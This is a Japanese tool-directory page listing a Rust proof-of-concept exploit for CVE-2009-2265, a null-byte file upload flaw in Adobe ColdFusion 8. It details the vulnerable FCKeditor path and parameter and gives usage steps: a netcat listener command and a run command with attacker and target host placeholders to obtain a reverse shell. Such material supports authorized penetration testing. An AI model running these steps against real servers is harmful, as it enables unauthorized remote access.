Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2009-2265 — CVE-2009-2265エクスプロイトのPOCをRustで実装したもので、Adobe ColdFusion 8を対象としています。 | Kitploit
ツール/GitHubGitHub/nika0x38/cve-2009-2265
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubnika0x38/cve-2009-2265

CVE-2009-2265

CVE-2009-2265エクスプロイトのPOCをRustで実装したもので、Adobe ColdFusion 8を対象としています。

リポジトリを見る
10ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2009-2265 - Adobe ColdFusion 8 ファイルアップロード RCE

RustSecurity

CVE-2009-2265 エクスプロイトの POC を Rust で実装したもので、Adobe ColdFusion 8 を対象としています。


脆弱性の概要

この脆弱性により、認証されていない攻撃者が Adobe ColdFusion 8 を実行しているサーバーの Web アクセス可能なディレクトリに任意のファイルをアップロードでき、リモートコード実行 (RCE) につながります。

技術的詳細

  • 脆弱性: ヌルバイトインジェクションによるディレクトリトラバーサル
  • コンポーネント: FCKeditor upload.cfm コネクタ
  • パラメータ: CurrentFolder
  • 影響: リモートコード実行 (RCE)
  • 影響を受けるソフトウェア: Adobe ColdFusion 8.0.1 およびそれ以前

説明

この脆弱性は、/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm にある FCKeditor コンポーネントのファイルアップロード機能に存在します。HTTP GET パラメータ CurrentFolder が適切にサニタイズされておらず、ヌルバイト (%00) インジェクション攻撃が可能になっています。

攻撃者は CurrentFolder パラメータを /<filename>.jsp%00 に設定したリクエストを細工することで、サーバー側の拡張子チェックをバイパスできます。基盤となるシステム (多くの場合 Java) はヌルバイトを文字列の終端として解釈し、ファイル名を <filename>.jsp として扱います。これにより、攻撃者は悪意のある JSP ファイルをアップロードできます。サーバーはこのファイルを公開アクセス可能なディレクトリ (/userfiles/file/) に保存し、そこから URL にアクセスするだけで実行されます。

この POC は、JSP リバースシェルペイロードを生成し、ヌルバイト脆弱性を利用してアップロードし、それをトリガーしてターゲットシステム上でシェルを獲得するプロセスを自動化します。

使用方法

以下の手順でエクスプロイトをコンパイルして実行します。

ステップ 1: Netcat リスナーをセットアップする

エクスプロイトを実行する前に、ローカルマシンでリスナーを起動して、送信されてくるリバースシェルを受け取ります。

root@kitploit:~

nc -lnvp <attacker-port>

ステップ 2: エクスプロイトを実行する

コンパイル済みバイナリを実行し、リバースシェル用のローカルのホスト/ポートと、リモートターゲットのホスト/ポートを指定します。

root@kitploit:~

cargo run -- --lhost <LHOST> --lport <LPORT> --rhost <RHOST> --rport <RPORT>

スクリプトがペイロードをトリガーすると、Netcat リスナーで接続を受け取ります。

免責事項

このツールは教育目的および許可を得たペネトレーションテストのみを対象としています。責任を持って、自分が所有するか明示的な許可を得たシステムに対してのみ使用してください。

ツールをダウンロード